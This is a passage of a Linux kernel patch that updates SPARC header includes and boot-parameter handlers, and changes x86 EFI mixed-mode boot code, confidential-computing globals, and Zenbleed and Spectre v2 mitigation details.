+index e5e5ff6b9a5c5..3a73bc466f95d 100644
+--- a/arch/sparc/kernel/leon_pci.c
++++ b/arch/sparc/kernel/leon_pci.c
+@@ -7,7 +7,8 @@
+  * Code is partially derived from pcic.c
+  */
+ 
+-#include <linux/of_device.h>
++#include <linux/of.h>
++#include <linux/platform_device.h>
+ #include <linux/kernel.h>
+ #include <linux/pci.h>
+ #include <linux/export.h>
+diff --git a/arch/sparc/kernel/leon_pci_grpci1.c b/arch/sparc/kernel/leon_pci_grpci1.c
+index c32590bdd3120..b2b639bee0684 100644
+--- a/arch/sparc/kernel/leon_pci_grpci1.c
++++ b/arch/sparc/kernel/leon_pci_grpci1.c
+@@ -13,10 +13,11 @@
+  * Contributors: Daniel Hellstrom <daniel@gaisler.com>
+  */
+ 
+-#include <linux/of_device.h>
+ #include <linux/export.h>
+ #include <linux/kernel.h>
++#include <linux/of.h>
+ #include <linux/of_irq.h>
++#include <linux/platform_device.h>
+ #include <linux/delay.h>
+ #include <linux/pci.h>
+ 
+diff --git a/arch/sparc/kernel/leon_pci_grpci2.c b/arch/sparc/kernel/leon_pci_grpci2.c
+index dd06abc61657f..ac2acd62a24ec 100644
+--- a/arch/sparc/kernel/leon_pci_grpci2.c
++++ b/arch/sparc/kernel/leon_pci_grpci2.c
+@@ -6,12 +6,14 @@
+  *
+  */
+ 
+-#include <linux/of_device.h>
+ #include <linux/kernel.h>
+ #include <linux/pci.h>
+ #include <linux/slab.h>
+ #include <linux/delay.h>
+ #include <linux/export.h>
++#include <linux/of.h>
++#include <linux/platform_device.h>
++
+ #include <asm/io.h>
+ #include <asm/leon.h>
+ #include <asm/vaddrs.h>
+diff --git a/arch/sparc/kernel/nmi.c b/arch/sparc/kernel/nmi.c
+index 060fff95a305c..fbf25e926f67c 100644
+--- a/arch/sparc/kernel/nmi.c
++++ b/arch/sparc/kernel/nmi.c
+@@ -274,7 +274,7 @@ static int __init setup_nmi_watchdog(char *str)
+ 	if (!strncmp(str, "panic", 5))
+ 		panic_on_timeout = 1;
+ 
+-	return 0;
++	return 1;
+ }
+ __setup("nmi_watchdog=", setup_nmi_watchdog);
+ 
+diff --git a/arch/sparc/kernel/of_device_32.c b/arch/sparc/kernel/of_device_32.c
+index 4ebf51e6e78ec..9ac6853b34c1b 100644
+--- a/arch/sparc/kernel/of_device_32.c
++++ b/arch/sparc/kernel/of_device_32.c
+@@ -7,8 +7,8 @@
+ #include <linux/slab.h>
+ #include <linux/errno.h>
+ #include <linux/irq.h>
+-#include <linux/of_device.h>
+ #include <linux/of_platform.h>
++#include <linux/platform_device.h>
+ #include <linux/dma-mapping.h>
+ #include <asm/leon.h>
+ #include <asm/leon_amba.h>
+diff --git a/arch/sparc/kernel/of_device_64.c b/arch/sparc/kernel/of_device_64.c
+index 5a9f86b1d4e7e..a8ccd7260fe7f 100644
+--- a/arch/sparc/kernel/of_device_64.c
++++ b/arch/sparc/kernel/of_device_64.c
+@@ -1,7 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0
+ #include <linux/string.h>
+ #include <linux/kernel.h>
+-#include <linux/of.h>
+ #include <linux/dma-mapping.h>
+ #include <linux/init.h>
+ #include <linux/export.h>
+@@ -9,8 +8,9 @@
+ #include <linux/slab.h>
+ #include <linux/errno.h>
+ #include <linux/irq.h>
+-#include <linux/of_device.h>
++#include <linux/of.h>
+ #include <linux/of_platform.h>
++#include <linux/platform_device.h>
+ #include <asm/spitfire.h>
+ 
+ #include "of_device_common.h"
+diff --git a/arch/sparc/kernel/of_device_common.c b/arch/sparc/kernel/of_device_common.c
+index e717a56efc5d3..a09724381bd40 100644
+--- a/arch/sparc/kernel/of_device_common.c
++++ b/arch/sparc/kernel/of_device_common.c
+@@ -1,15 +1,15 @@
+ // SPDX-License-Identifier: GPL-2.0-only
+ #include <linux/string.h>
+ #include <linux/kernel.h>
+-#include <linux/of.h>
+ #include <linux/export.h>
+ #include <linux/mod_devicetable.h>
+ #include <linux/errno.h>
+ #include <linux/irq.h>
++#include <linux/of.h>
+ #include <linux/of_platform.h>
+ #include <linux/of_address.h>
+-#include <linux/of_device.h>
+ #include <linux/of_irq.h>
++#include <linux/platform_device.h>
+ 
+ #include "of_device_common.h"
+ 
+diff --git a/arch/sparc/kernel/pci.c b/arch/sparc/kernel/pci.c
+index cb1ef25116e94..5637b37ba9114 100644
+--- a/arch/sparc/kernel/pci.c
++++ b/arch/sparc/kernel/pci.c
+@@ -20,8 +20,9 @@
+ #include <linux/irq.h>
+ #include <linux/init.h>
+ #include <linux/of.h>
+-#include <linux/of_device.h>
++#include <linux/of_platform.h>
+ #include <linux/pgtable.h>
++#include <linux/platform_device.h>
+ 
+ #include <linux/uaccess.h>
+ #include <asm/irq.h>
+diff --git a/arch/sparc/kernel/pci_common.c b/arch/sparc/kernel/pci_common.c
+index 4759ccd542fe6..5eeec9ad68457 100644
+--- a/arch/sparc/kernel/pci_common.c
++++ b/arch/sparc/kernel/pci_common.c
+@@ -8,7 +8,8 @@
+ #include <linux/slab.h>
+ #include <linux/pci.h>
+ #include <linux/device.h>
+-#include <linux/of_device.h>
++#include <linux/of.h>
++#include <linux/platform_device.h>
+ 
+ #include <asm/prom.h>
+ #include <asm/oplib.h>
+diff --git a/arch/sparc/kernel/pci_fire.c b/arch/sparc/kernel/pci_fire.c
+index 0ca08d455e805..0b91bde80fdc5 100644
+--- a/arch/sparc/kernel/pci_fire.c
++++ b/arch/sparc/kernel/pci_fire.c
+@@ -10,7 +10,8 @@
+ #include <linux/msi.h>
+ #include <linux/export.h>
+ #include <linux/irq.h>
+-#include <linux/of_device.h>
++#include <linux/of.h>
++#include <linux/platform_device.h>
+ #include <linux/numa.h>
+ 
+ #include <asm/prom.h>
+diff --git a/arch/sparc/kernel/pci_impl.h b/arch/sparc/kernel/pci_impl.h
+index 4e3d15189fa95..f31761f517575 100644
+--- a/arch/sparc/kernel/pci_impl.h
++++ b/arch/sparc/kernel/pci_impl.h
+@@ -11,7 +11,6 @@
+ #include <linux/spinlock.h>
+ #include <linux/pci.h>
+ #include <linux/msi.h>
+-#include <linux/of_device.h>
+ #include <asm/io.h>
+ #include <asm/prom.h>
+ #include <asm/iommu.h>
+diff --git a/arch/sparc/kernel/pci_msi.c b/arch/sparc/kernel/pci_msi.c
+index 9ed11985768e1..fc7402948b7bc 100644
+--- a/arch/sparc/kernel/pci_msi.c
++++ b/arch/sparc/kernel/pci_msi.c
+@@ -5,6 +5,8 @@
+  */
+ #include <linux/kernel.h>
+ #include <linux/interrupt.h>
++#include <linux/of.h>
++#include <linux/platform_device.h>
+ #include <linux/slab.h>
+ #include <linux/irq.h>
+ 
+diff --git a/arch/sparc/kernel/pci_psycho.c b/arch/sparc/kernel/pci_psycho.c
+index f413371da3871..1efc98305ec76 100644
+--- a/arch/sparc/kernel/pci_psycho.c
++++ b/arch/sparc/kernel/pci_psycho.c
+@@ -13,7 +13,9 @@
+ #include <linux/export.h>
+ #include <linux/slab.h>
+ #include <linux/interrupt.h>
+-#include <linux/of_device.h>
++#include <linux/of.h>
++#include <linux/of_platform.h>
++#include <linux/platform_device.h>
+ 
+ #include <asm/iommu.h>
+ #include <asm/irq.h>
+diff --git a/arch/sparc/kernel/pci_sun4v.c b/arch/sparc/kernel/pci_sun4v.c
+index 3844809718052..0ddef827e0f99 100644
+--- a/arch/sparc/kernel/pci_sun4v.c
++++ b/arch/sparc/kernel/pci_sun4v.c
+@@ -15,7 +15,8 @@
+ #include <linux/msi.h>
+ #include <linux/export.h>
+ #include <linux/log2.h>
+-#include <linux/of_device.h>
++#include <linux/of.h>
++#include <linux/platform_device.h>
+ #include <linux/dma-map-ops.h>
+ #include <asm/iommu-common.h>
+ 
+diff --git a/arch/sparc/kernel/pmc.c b/arch/sparc/kernel/pmc.c
+index b5c1eb33b9518..69a0206e56f01 100644
+--- a/arch/sparc/kernel/pmc.c
++++ b/arch/sparc/kernel/pmc.c
+@@ -11,7 +11,7 @@
+ #include <linux/init.h>
+ #include <linux/pm.h>
+ #include <linux/of.h>
+-#include <linux/of_device.h>
++#include <linux/platform_device.h>
+ #include <linux/module.h>
+ 
+ #include <asm/io.h>
+diff --git a/arch/sparc/kernel/power.c b/arch/sparc/kernel/power.c
+index d941875dd7186..2f6c909e1755d 100644
+--- a/arch/sparc/kernel/power.c
++++ b/arch/sparc/kernel/power.c
+@@ -9,7 +9,8 @@
+ #include <linux/init.h>
+ #include <linux/interrupt.h>
+ #include <linux/reboot.h>
+-#include <linux/of_device.h>
++#include <linux/of.h>
++#include <linux/platform_device.h>
+ 
+ #include <asm/prom.h>
+ #include <asm/io.h>
+diff --git a/arch/sparc/kernel/prom_irqtrans.c b/arch/sparc/kernel/prom_irqtrans.c
+index 28aff1c524b58..426bd08cb2ab1 100644
+--- a/arch/sparc/kernel/prom_irqtrans.c
++++ b/arch/sparc/kernel/prom_irqtrans.c
+@@ -4,6 +4,7 @@
+ #include <linux/init.h>
+ #include <linux/of.h>
+ #include <linux/of_platform.h>
++#include <linux/platform_device.h>
+ 
+ #include <asm/oplib.h>
+ #include <asm/prom.h>
+diff --git a/arch/sparc/kernel/psycho_common.c b/arch/sparc/kernel/psycho_common.c
+index e90bcb6bad7fc..5ee74b4c0cf40 100644
+--- a/arch/sparc/kernel/psycho_common.c
++++ b/arch/sparc/kernel/psycho_common.c
+@@ -6,6 +6,7 @@
+ #include <linux/kernel.h>
+ #include <linux/interrupt.h>
+ #include <linux/numa.h>
++#include <linux/platform_device.h>
+ 
+ #include <asm/upa.h>
+ 
+diff --git a/arch/sparc/kernel/sbus.c b/arch/sparc/kernel/sbus.c
+index 32141e1006c4a..0bababf6f2bcd 100644
+--- a/arch/sparc/kernel/sbus.c
++++ b/arch/sparc/kernel/sbus.c
+@@ -14,7 +14,8 @@
+ #include <linux/init.h>
+ #include <linux/interrupt.h>
+ #include <linux/of.h>
+-#include <linux/of_device.h>
++#include <linux/of_platform.h>
++#include <linux/platform_device.h>
+ #include <linux/numa.h>
+ 
+ #include <asm/page.h>
+diff --git a/arch/sparc/kernel/time_32.c b/arch/sparc/kernel/time_32.c
+index 8a08830e4a653..79934beba03a6 100644
+--- a/arch/sparc/kernel/time_32.c
++++ b/arch/sparc/kernel/time_32.c
+@@ -33,7 +33,6 @@
+ #include <linux/ioport.h>
+ #include <linux/profile.h>
+ #include <linux/of.h>
+-#include <linux/of_device.h>
+ #include <linux/platform_device.h>
+ 
+ #include <asm/mc146818rtc.h>
+diff --git a/arch/sparc/mm/io-unit.c b/arch/sparc/mm/io-unit.c
+index bf3e6d2fe5d94..3afbbe5fba46b 100644
+--- a/arch/sparc/mm/io-unit.c
++++ b/arch/sparc/mm/io-unit.c
+@@ -13,7 +13,8 @@
+ #include <linux/bitops.h>
+ #include <linux/dma-map-ops.h>
+ #include <linux/of.h>
+-#include <linux/of_device.h>
++#include <linux/of_platform.h>
++#include <linux/platform_device.h>
+ 
+ #include <asm/io.h>
+ #include <asm/io-unit.h>
+diff --git a/arch/sparc/mm/iommu.c b/arch/sparc/mm/iommu.c
+index 9e3f6933ca13f..14e178bfe33ab 100644
+--- a/arch/sparc/mm/iommu.c
++++ b/arch/sparc/mm/iommu.c
+@@ -7,14 +7,15 @@
+  * Copyright (C) 1996 Eddie C. Dost    (ecd@skynet.be)
+  * Copyright (C) 1997,1998 Jakub Jelinek    (jj@sunsite.mff.cuni.cz)
+  */
+- 
++
+ #include <linux/kernel.h>
+ #include <linux/init.h>
+ #include <linux/mm.h>
+ #include <linux/slab.h>
+ #include <linux/dma-map-ops.h>
+ #include <linux/of.h>
+-#include <linux/of_device.h>
++#include <linux/of_platform.h>
++#include <linux/platform_device.h>
+ 
+ #include <asm/io.h>
+ #include <asm/mxcc.h>
+diff --git a/arch/sparc/vdso/vma.c b/arch/sparc/vdso/vma.c
+index ae9a86cb6f3d9..2b97df0850aa7 100644
+--- a/arch/sparc/vdso/vma.c
++++ b/arch/sparc/vdso/vma.c
+@@ -449,9 +449,8 @@ static __init int vdso_setup(char *s)
+ 	unsigned long val;
+ 
+ 	err = kstrtoul(s, 10, &val);
+-	if (err)
+-		return err;
+-	vdso_enabled = val;
+-	return 0;
++	if (!err)
++		vdso_enabled = val;
++	return 1;
+ }
+ __setup("vdso=", vdso_setup);
+diff --git a/arch/x86/Kconfig b/arch/x86/Kconfig
+index 5caa023e98397..bea53385d31e3 100644
+--- a/arch/x86/Kconfig
++++ b/arch/x86/Kconfig
+@@ -1553,19 +1553,6 @@ config AMD_MEM_ENCRYPT
+ 	  This requires an AMD processor that supports Secure Memory
+ 	  Encryption (SME).
+ 
+-config AMD_MEM_ENCRYPT_ACTIVE_BY_DEFAULT
+-	bool "Activate AMD Secure Memory Encryption (SME) by default"
+-	depends on AMD_MEM_ENCRYPT
+-	help
+-	  Say yes to have system memory encrypted by default if running on
+-	  an AMD processor that supports Secure Memory Encryption (SME).
+-
+-	  If set to Y, then the encryption of system memory can be
+-	  deactivated with the mem_encrypt=off command line option.
+-
+-	  If set to N, then the encryption of system memory can be
+-	  activated with the mem_encrypt=on command line option.
+-
+ # Common NUMA Features
+ config NUMA
+ 	bool "NUMA Memory Allocation and Scheduler Support"
+diff --git a/arch/x86/boot/compressed/efi_mixed.S b/arch/x86/boot/compressed/efi_mixed.S
+index 8232c5b2a9bf5..fb6d60dcd6ed1 100644
+--- a/arch/x86/boot/compressed/efi_mixed.S
++++ b/arch/x86/boot/compressed/efi_mixed.S
+@@ -15,10 +15,12 @@
+  */
+ 
+ #include <linux/linkage.h>
++#include <asm/asm-offsets.h>
+ #include <asm/msr.h>
+ #include <asm/page_types.h>
+ #include <asm/processor-flags.h>
+ #include <asm/segment.h>
++#include <asm/setup.h>
+ 
+ 	.code64
+ 	.text
+@@ -49,6 +51,11 @@ SYM_FUNC_START(startup_64_mixed_mode)
+ 	lea	efi32_boot_args(%rip), %rdx
+ 	mov	0(%rdx), %edi
+ 	mov	4(%rdx), %esi
++
++	/* Switch to the firmware's stack */
++	movl	efi32_boot_sp(%rip), %esp
++	andl	$~7, %esp
++
+ #ifdef CONFIG_EFI_HANDOVER_PROTOCOL
+ 	mov	8(%rdx), %edx		// saved bootparams pointer
+ 	test	%edx, %edx
+@@ -150,6 +157,7 @@ SYM_FUNC_END(__efi64_thunk)
+ SYM_FUNC_START(efi32_stub_entry)
+ 	call	1f
+ 1:	popl	%ecx
++	leal	(efi32_boot_args - 1b)(%ecx), %ebx
+ 
+ 	/* Clear BSS */
+ 	xorl	%eax, %eax
+@@ -164,6 +172,7 @@ SYM_FUNC_START(efi32_stub_entry)
+ 	popl	%ecx
+ 	popl	%edx
+ 	popl	%esi
++	movl	%esi, 8(%ebx)
+ 	jmp	efi32_entry
+ SYM_FUNC_END(efi32_stub_entry)
+ #endif
+@@ -240,8 +249,6 @@ SYM_FUNC_END(efi_enter32)
+  *
+  * Arguments:	%ecx	image handle
+  * 		%edx	EFI system table pointer
+- *		%esi	struct bootparams pointer (or NULL when not using
+- *			the EFI handover protocol)
+  *
+  * Since this is the point of no return for ordinary execution, no registers
+  * are considered live except for the function parameters. [Note that the EFI
+@@ -260,13 +267,25 @@ SYM_FUNC_START_LOCAL(efi32_entry)
+ 	/* Store firmware IDT descriptor */
+ 	sidtl	(efi32_boot_idt - 1b)(%ebx)
+ 
++	/* Store firmware stack pointer */
++	movl	%esp, (efi32_boot_sp - 1b)(%ebx)
++
+ 	/* Store boot arguments */
+ 	leal	(efi32_boot_args - 1b)(%ebx), %ebx
+ 	movl	%ecx, 0(%ebx)
+ 	movl	%edx, 4(%ebx)
+-	movl	%esi, 8(%ebx)
+ 	movb	$0x0, 12(%ebx)          // efi_is64
+ 
++	/*
++	 * Allocate some memory for a temporary struct boot_params, which only
++	 * needs the minimal pieces that startup_32() relies on.
++	 */
++	subl	$PARAM_SIZE, %esp
++	movl	%esp, %esi
++	movl	$PAGE_SIZE, BP_kernel_alignment(%esi)
++	movl	$_end - 1b, BP_init_size(%esi)
++	subl	$startup_32 - 1b, BP_init_size(%esi)
++
+ 	/* Disable paging */
+ 	movl	%cr0, %eax
+ 	btrl	$X86_CR0_PG_BIT, %eax
+@@ -292,8 +311,7 @@ SYM_FUNC_START(efi32_pe_entry)
+ 
+ 	movl	8(%ebp), %ecx			// image_handle
+ 	movl	12(%ebp), %edx			// sys_table
+-	xorl	%esi, %esi
+-	jmp	efi32_entry			// pass %ecx, %edx, %esi
++	jmp	efi32_entry			// pass %ecx, %edx
+ 						// no other registers remain live
+ 
+ 2:	popl	%edi				// restore callee-save registers
+@@ -324,5 +342,6 @@ SYM_DATA_END(efi32_boot_idt)
+ 
+ SYM_DATA_LOCAL(efi32_boot_cs, .word 0)
+ SYM_DATA_LOCAL(efi32_boot_ds, .word 0)
++SYM_DATA_LOCAL(efi32_boot_sp, .long 0)
+ SYM_DATA_LOCAL(efi32_boot_args, .long 0, 0, 0)
+ SYM_DATA(efi_is64, .byte 1)
+diff --git a/arch/x86/coco/core.c b/arch/x86/coco/core.c
+index 49b44f8814846..1d3ad275c3664 100644
+--- a/arch/x86/coco/core.c
++++ b/arch/x86/coco/core.c
+@@ -13,8 +13,8 @@
+ #include <asm/coco.h>
+ #include <asm/processor.h>
+ 
+-static enum cc_vendor vendor __ro_after_init;
+-static u64 cc_mask __ro_after_init;
++enum cc_vendor cc_vendor __ro_after_init = CC_VENDOR_NONE;
++u64 cc_mask __ro_after_init;
+ 
+ static bool intel_cc_platform_has(enum cc_attr attr)
+ {
+@@ -83,7 +83,7 @@ static bool hyperv_cc_platform_has(enum cc_attr attr)
+ 
+ bool cc_platform_has(enum cc_attr attr)
+ {
+-	switch (vendor) {
++	switch (cc_vendor) {
+ 	case CC_VENDOR_AMD:
+ 		return amd_cc_platform_has(attr);
+ 	case CC_VENDOR_INTEL:
+@@ -105,7 +105,7 @@ u64 cc_mkenc(u64 val)
+ 	 * - for AMD, bit *set* means the page is encrypted
+ 	 * - for Intel *clear* means encrypted.
+ 	 */
+-	switch (vendor) {
++	switch (cc_vendor) {
+ 	case CC_VENDOR_AMD:
+ 		return val | cc_mask;
+ 	case CC_VENDOR_INTEL:
+@@ -118,7 +118,7 @@ u64 cc_mkenc(u64 val)
+ u64 cc_mkdec(u64 val)
+ {
+ 	/* See comment in cc_mkenc() */
+-	switch (vendor) {
++	switch (cc_vendor) {
+ 	case CC_VENDOR_AMD:
+ 		return val & ~cc_mask;
+ 	case CC_VENDOR_INTEL:
+@@ -128,13 +128,3 @@ u64 cc_mkdec(u64 val)
+ 	}
+ }
+ EXPORT_SYMBOL_GPL(cc_mkdec);
+-
+-__init void cc_set_vendor(enum cc_vendor v)
+-{
+-	vendor = v;
+-}
+-
+-__init void cc_set_mask(u64 mask)
+-{
+-	cc_mask = mask;
+-}
+diff --git a/arch/x86/coco/tdx/tdx.c b/arch/x86/coco/tdx/tdx.c
+index d0565a9e7d8c9..4692450aeb4d3 100644
+--- a/arch/x86/coco/tdx/tdx.c
++++ b/arch/x86/coco/tdx/tdx.c
+@@ -793,7 +793,7 @@ void __init tdx_early_init(void)
+ 
+ 	setup_force_cpu_cap(X86_FEATURE_TDX_GUEST);
+ 
+-	cc_set_vendor(CC_VENDOR_INTEL);
++	cc_vendor = CC_VENDOR_INTEL;
+ 	tdx_parse_tdinfo(&cc_mask);
+ 	cc_set_mask(cc_mask);
+ 
+diff --git a/arch/x86/include/asm/asm.h b/arch/x86/include/asm/asm.h
+index fbcfec4dc4ccd..ca8eed1d496ab 100644
+--- a/arch/x86/include/asm/asm.h
++++ b/arch/x86/include/asm/asm.h
+@@ -113,6 +113,20 @@
+ 
+ #endif
+ 
++#ifndef __ASSEMBLY__
++#ifndef __pic__
++static __always_inline __pure void *rip_rel_ptr(void *p)
++{
++	asm("leaq %c1(%%rip), %0" : "=r"(p) : "i"(p));
++
++	return p;
++}
++#define RIP_REL_REF(var)	(*(typeof(&(var)))rip_rel_ptr(&(var)))
++#else
++#define RIP_REL_REF(var)	(var)
++#endif
++#endif
++
+ /*
+  * Macros to generate condition code outputs from inline assembly,
+  * The output operand must be type "bool".
+diff --git a/arch/x86/include/asm/coco.h b/arch/x86/include/asm/coco.h
+index 3d98c3a60d34f..60bb26097da1a 100644
+--- a/arch/x86/include/asm/coco.h
++++ b/arch/x86/include/asm/coco.h
+@@ -2,6 +2,7 @@
+ #ifndef _ASM_X86_COCO_H
+ #define _ASM_X86_COCO_H
+ 
++#include <asm/asm.h>
+ #include <asm/types.h>
+ 
+ enum cc_vendor {
+@@ -11,10 +12,15 @@ enum cc_vendor {
+ 	CC_VENDOR_INTEL,
+ };
+ 
+-void cc_set_vendor(enum cc_vendor v);
+-void cc_set_mask(u64 mask);
++extern enum cc_vendor cc_vendor;
++extern u64 cc_mask;
+ 
+ #ifdef CONFIG_ARCH_HAS_CC_PLATFORM
++static inline void cc_set_mask(u64 mask)
++{
++	RIP_REL_REF(cc_mask) = mask;
++}
++
+ u64 cc_mkenc(u64 val);
+ u64 cc_mkdec(u64 val);
+ #else
+diff --git a/arch/x86/include/asm/cpufeatures.h b/arch/x86/include/asm/cpufeatures.h
+index b97a70aa4de90..9a157942ae3dd 100644
+--- a/arch/x86/include/asm/cpufeatures.h
++++ b/arch/x86/include/asm/cpufeatures.h
+@@ -427,6 +427,7 @@
+ #define X86_FEATURE_V_TSC_AUX		(19*32+ 9) /* "" Virtual TSC_AUX */
+ #define X86_FEATURE_SME_COHERENT	(19*32+10) /* "" AMD hardware-enforced cache coherency */
+ 
++#define X86_FEATURE_AUTOIBRS		(20*32+ 8) /* "" Automatic IBRS */
+ #define X86_FEATURE_SBPB		(20*32+27) /* "" Selective Branch Prediction Barrier */
+ #define X86_FEATURE_IBPB_BRTYPE		(20*32+28) /* "" MSR_PRED_CMD[IBPB] flushes all branch type predictions */
+ #define X86_FEATURE_SRSO_NO		(20*32+29) /* "" CPU is not affected by SRSO */
+diff --git a/arch/x86/include/asm/mem_encrypt.h b/arch/x86/include/asm/mem_encrypt.h
+index c91326593e741..41d06822bc8cd 100644
+--- a/arch/x86/include/asm/mem_encrypt.h
++++ b/arch/x86/include/asm/mem_encrypt.h
+@@ -15,7 +15,8 @@
+ #include <linux/init.h>
+ #include <linux/cc_platform.h>
+ 
+-#include <asm/bootparam.h>
++#include <asm/asm.h>
++struct boot_params;
+ 
+ #ifdef CONFIG_X86_MEM_ENCRYPT
+ void __init mem_encrypt_init(void);
+@@ -57,6 +58,11 @@ void __init mem_encrypt_free_decrypted_mem(void);
+ 
+ void __init sev_es_init_vc_handling(void);
+ 
++static inline u64 sme_get_me_mask(void)
++{
++	return RIP_REL_REF(sme_me_mask);
++}
++
+ #define __bss_decrypted __section(".bss..decrypted")
+ 
+ #else	/* !CONFIG_AMD_MEM_ENCRYPT */
+@@ -88,6 +94,8 @@ early_set_mem_enc_dec_hypercall(unsigned long vaddr, unsigned long size, bool en
+ 
+ static inline void mem_encrypt_free_decrypted_mem(void) { }
+ 
++static inline u64 sme_get_me_mask(void) { return 0; }
++
+ #define __bss_decrypted
+ 
+ #endif	/* CONFIG_AMD_MEM_ENCRYPT */
+@@ -105,11 +113,6 @@ void add_encrypt_protection_map(void);
+ 
+ extern char __start_bss_decrypted[], __end_bss_decrypted[], __start_bss_decrypted_unused[];
+ 
+-static inline u64 sme_get_me_mask(void)
+-{
+-	return sme_me_mask;
+-}
+-
+ #endif	/* __ASSEMBLY__ */
+ 
+ #endif	/* __X86_MEM_ENCRYPT_H__ */
+diff --git a/arch/x86/include/asm/msr-index.h b/arch/x86/include/asm/msr-index.h
+index 005e41dc7ee5a..33a19ef23644d 100644
+--- a/arch/x86/include/asm/msr-index.h
++++ b/arch/x86/include/asm/msr-index.h
+@@ -30,6 +30,7 @@
+ #define _EFER_SVME		12 /* Enable virtualization */
+ #define _EFER_LMSLE		13 /* Long Mode Segment Limit Enable */
+ #define _EFER_FFXSR		14 /* Enable Fast FXSAVE/FXRSTOR */
++#define _EFER_AUTOIBRS		21 /* Enable Automatic IBRS */
+ 
+ #define EFER_SCE		(1<<_EFER_SCE)
+ #define EFER_LME		(1<<_EFER_LME)
+@@ -38,6 +39,7 @@
+ #define EFER_SVME		(1<<_EFER_SVME)
+ #define EFER_LMSLE		(1<<_EFER_LMSLE)
+ #define EFER_FFXSR		(1<<_EFER_FFXSR)
++#define EFER_AUTOIBRS		(1<<_EFER_AUTOIBRS)
+ 
+ /* Intel MSRs. Some also available on other CPUs */
+ 
+diff --git a/arch/x86/include/asm/sev.h b/arch/x86/include/asm/sev.h
+index cf98fc28601fb..c57dd21155bd7 100644
+--- a/arch/x86/include/asm/sev.h
++++ b/arch/x86/include/asm/sev.h
+@@ -196,12 +196,12 @@ void __init early_snp_set_memory_private(unsigned long vaddr, unsigned long padd
+ 					 unsigned long npages);
+ void __init early_snp_set_memory_shared(unsigned long vaddr, unsigned long paddr,
+ 					unsigned long npages);
+-void __init snp_prep_memory(unsigned long paddr, unsigned int sz, enum psc_op op);
+ void snp_set_memory_shared(unsigned long vaddr, unsigned long npages);
+ void snp_set_memory_private(unsigned long vaddr, unsigned long npages);
+ void snp_set_wakeup_secondary_cpu(void);
+ bool snp_init(struct boot_params *bp);
+ void __init __noreturn snp_abort(void);
++void snp_dmi_setup(void);
+ int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input, struct snp_guest_request_ioctl *rio);
+ u64 snp_get_unsupported_features(u64 status);
+ u64 sev_get_status(void);
+@@ -219,12 +219,12 @@ static inline void __init
+ early_snp_set_memory_private(unsigned long vaddr, unsigned long paddr, unsigned long npages) { }
+ static inline void __init
+ early_snp_set_memory_shared(unsigned long vaddr, unsigned long paddr, unsigned long npages) { }
+-static inline void __init snp_prep_memory(unsigned long paddr, unsigned int sz, enum psc_op op) { }
+ static inline void snp_set_memory_shared(unsigned long vaddr, unsigned long npages) { }
+ static inline void snp_set_memory_private(unsigned long vaddr, unsigned long npages) { }
+ static inline void snp_set_wakeup_secondary_cpu(void) { }
+ static inline bool snp_init(struct boot_params *bp) { return false; }
+ static inline void snp_abort(void) { }
++static inline void snp_dmi_setup(void) { }
+ static inline int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input, struct snp_guest_request_ioctl *rio)
+ {
+ 	return -ENOTTY;
+diff --git a/arch/x86/include/asm/suspend_32.h b/arch/x86/include/asm/suspend_32.h
+index a800abb1a9925..d8416b3bf832e 100644
+--- a/arch/x86/include/asm/suspend_32.h
++++ b/arch/x86/include/asm/suspend_32.h
+@@ -12,11 +12,6 @@
+ 
+ /* image of the saved processor state */
+ struct saved_context {
+-	/*
+-	 * On x86_32, all segment registers except gs are saved at kernel
+-	 * entry in pt_regs.
+-	 */
+-	u16 gs;
+ 	unsigned long cr0, cr2, cr3, cr4;
+ 	u64 misc_enable;
+ 	struct saved_msrs saved_msrs;
+@@ -27,6 +22,11 @@ struct saved_context {
+ 	unsigned long tr;
+ 	unsigned long safety;
+ 	unsigned long return_address;
++	/*
++	 * On x86_32, all segment registers except gs are saved at kernel
++	 * entry in pt_regs.
++	 */
++	u16 gs;
+ 	bool misc_enable_saved;
+ } __attribute__((packed));
+ 
+diff --git a/arch/x86/include/asm/x86_init.h b/arch/x86/include/asm/x86_init.h
+index 034e62838b284..c3e910b1d5a25 100644
+--- a/arch/x86/include/asm/x86_init.h
++++ b/arch/x86/include/asm/x86_init.h
+@@ -30,12 +30,13 @@ struct x86_init_mpparse {
+  * @reserve_resources:		reserve the standard resources for the
+  *				platform
+  * @memory_setup:		platform specific memory setup
+- *
++ * @dmi_setup:			platform specific DMI setup
+  */
+ struct x86_init_resources {
+ 	void (*probe_roms)(void);
+ 	void (*reserve_resources)(void);
+ 	char *(*memory_setup)(void);
++	void (*dmi_setup)(void);
+ };
+ 
+ /**
+diff --git a/arch/x86/kernel/cpu/amd.c b/arch/x86/kernel/cpu/amd.c
+index c1d09c8844d67..425092806f8fe 100644
+--- a/arch/x86/kernel/cpu/amd.c
++++ b/arch/x86/kernel/cpu/amd.c
+@@ -997,11 +997,11 @@ static bool cpu_has_zenbleed_microcode(void)
+ 	u32 good_rev = 0;
+ 
+ 	switch (boot_cpu_data.x86_model) {
+-	case 0x30 ... 0x3f: good_rev = 0x0830107a; break;
+-	case 0x60 ... 0x67: good_rev = 0x0860010b; break;
+-	case 0x68 ... 0x6f: good_rev = 0x08608105; break;
+-	case 0x70 ... 0x7f: good_rev = 0x08701032; break;
+-	case 0xa0 ... 0xaf: good_rev = 0x08a00008; break;
++	case 0x30 ... 0x3f: good_rev = 0x0830107b; break;
++	case 0x60 ... 0x67: good_rev = 0x0860010c; break;
++	case 0x68 ... 0x6f: good_rev = 0x08608107; break;
++	case 0x70 ... 0x7f: good_rev = 0x08701033; break;
++	case 0xa0 ... 0xaf: good_rev = 0x08a00009; break;
+ 
+ 	default:
+ 		return false;
+diff --git a/arch/x86/kernel/cpu/bugs.c b/arch/x86/kernel/cpu/bugs.c
+index c68789fdc123b..e3fec47a800bf 100644
+--- a/arch/x86/kernel/cpu/bugs.c
++++ b/arch/x86/kernel/cpu/bugs.c
+@@ -1354,19 +1354,21 @@ spectre_v2_user_select_mitigation(void)
+ 	}
+ 
+ 	/*
+-	 * If no STIBP, enhanced IBRS is enabled, or SMT impossible, STIBP
++	 * If no STIBP, Intel enhanced IBRS is enabled, or SMT impossible, STIBP
+ 	 * is not required.
+ 	 *
+-	 * Enhanced IBRS also protects against cross-thread branch target
++	 * Intel's Enhanced IBRS also protects against cross-thread branch target
+ 	 * injection in user-mode as the IBRS bit remains always set which
+ 	 * implicitly enables cross-thread protections.  However, in legacy IBRS
+ 	 * mode, the IBRS bit is set only on kernel entry and cleared on return
+-	 * to userspace. This disables the implicit cross-thread protection,
